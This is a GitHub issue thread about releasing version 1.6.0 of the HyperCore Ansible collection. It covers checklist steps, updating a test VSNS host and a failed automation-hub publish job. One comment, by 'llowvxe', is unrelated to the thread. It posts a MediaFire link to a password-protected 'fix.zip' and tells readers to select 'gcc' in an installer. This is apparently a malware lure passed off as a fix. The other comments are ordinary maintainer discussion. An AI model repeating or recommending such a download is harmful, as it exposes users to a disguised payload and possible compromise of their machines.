### ISSUE TITLE
:flying_saucer: Release version 1.6.0

### ISSUE THREAD

**Issue by justinc1** [ScaleComputing/HyperCoreAnsibleCollection#327]
The new release version is **1.6.0**

## Release steps

Please complete these steps in order.

- [x] Update the top-level README.md with links to new modules (run `./docs/helpers/generate_readme_fragment.py`)
- [x] Update the version number in galaxy.yml e.g. `1.1.1`
- [x] Update the changelog with `antsibull-changelog` e.g. `antsibull-changelog release --version 1.1.1`
- [x] Update the list of supported HyperCore versions in the README and in `docs/rst/index.rst`
- [x] Tag the commit with the version number prefixed with 'v' e.g. `v1.1.1`
- [x] Deploy new documentation using gh-pages - "Deploy static content to Pages"

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by justinc1** [comment]
Maybe we should also update https://10.5.11.204/ VSNS to latest release 9.4 version, and run integration tests against it? What do you think @shoriminimoe?

**Comment by shoriminimoe** [comment]
> Maybe we should also update https://10.5.11.204/ VSNS to latest release 9.4 version, and run integration tests against it? What do you think @shoriminimoe?

That is a good plan. I will work on getting that VSNS updated. Once that is done I will kick off the tests.

**Comment by shoriminimoe** [comment]
@justinc1 I created a new VSNS for HyperCore version 9.4.17 (the latest GA). It is available at https://10.5.11.205.

I wasn't able to get to updating the CI workflows to include it today. I can work on that tomorrow unless you get to it first.

**Comment by justinc1** [comment]
[publish-to-automation-platform](https://github.com/ScaleComputing/HyperCoreAnsibleCollection/actions/runs/10672959947/job/29581309922#logs) step failed.
@shoriminimoe, I was looking at https://goetzrieger.github.io/ansible-collections/6-automation-hub-and-galaxy/ and https://github.com/ansible/ansible-publish-action/blob/v1.0.0/action.yml. I think we can only change inputs.api_server (the environ vars ANSIBLE_GALAXY_SERVER_AUTOMATION_HUB_URL are not used, I think). The failed job - our input `api_server: automation_hub` resulted in error when accessing URL `unknown url type: 'automation_hub/api'`  - `/api` was added to input string. Maybe correct URL is `https://cloud.redhat.com/api/automation-hub/` or `https://console.redhat.com/api/automation-hub/` - I'm not sure, and neither of two does end with `/api`. We move this to separate issue if we want to fix this @shoriminimoe ?

**Comment by shoriminimoe** [comment]
> [publish-to-automation-platform](https://github.com/ScaleComputing/HyperCoreAnsibleCollection/actions/runs/10672959947/job/29581309922#logs) step failed.

I created #335 to address this.
